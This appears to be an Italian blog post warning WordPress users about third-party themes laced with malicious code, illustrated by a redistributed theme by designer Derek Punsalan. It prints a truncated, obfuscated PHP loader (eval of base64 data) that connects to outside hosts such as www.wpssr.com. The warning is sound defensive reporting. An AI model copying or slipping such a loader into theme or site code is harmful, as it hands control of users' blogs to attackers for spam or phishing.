Temi potenzialmente pericolosi per WordPress

logo wordpressUn post recentemente apparso sul forum di WordPress Italy ha posto in primo piano il problema sicurezza all'interno dei temi per la famosa piattaforma di blogging, diffusa sulla rete tanto da avere una folta schiera di appassionati che ogni giorno pubblicano su Internet nuovi template.

Allarmato dal dilagare di casi analoghi, lo staff di WordPress ha quindi deciso di mettere pubblicamente in guardia i propri utenti, citando il caso ormai diventato celebre di Derek Punsalan, un designer di Seattle che ha pubblicato sul web diversi temi, ripresi anche da siti esterni non ufficiali: proprio uno di questi, WP-Sphere, presentava alcune modifiche all'interno del codice realizzato da Punsalan, in particolare vi era stata una stringa, apparentemente innocua.

Tale pezzo di codice, che riportiamo nella seconda parte del post, secondo indagini effettuate dallo stesso Punsalan con l'ausilio di informatici esperti, non nasconderebbe altro che istruzioni maligne codificate, contenenti, come tanti altri temi scaricati da terzi, operazioni di spam o di fishing: se vedete tale codice all'interno delle righe di un template come prima cosa quindi provvedete ad eliminarlo, evitando così che il vostro blog possa diventare uno zombie in mano a malintenzionati.



@eval(@base64_decode(’aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3Q\
jY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20i\
LCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiw\
gJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICR\
SNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3I\
iOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMD\
kxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMk\
QwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1Qj\
M5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRj\
EyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNT\
BGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyIj\
sgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OT\
cgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3OD\

In termini più tecnici, a conferma di quanto appena riportato, su codescout.org è stata riportata un'analisi approfondita riguardante proprio il codice sovrastante, dalla quale è risultato un tentativo da parte della sezione maligna del tema di effettuare l'apertura di una connessione verso il sito www.wpssr.com, effettuando in caso di successo operazioni molto poco chiare e "pulite": il tutto sfruttando la funzione eval di PHP.

I consigli per non incappare in spiacevoli sorprese sono sempre i soliti: oltre a quello sopra citato, stare attenti alle fonti da cui si effettua il download di temi e plugin, privilegiando la galleria ufficiale di WordPress.

  • shares
  • Mail
2 commenti Aggiorna
Ordina: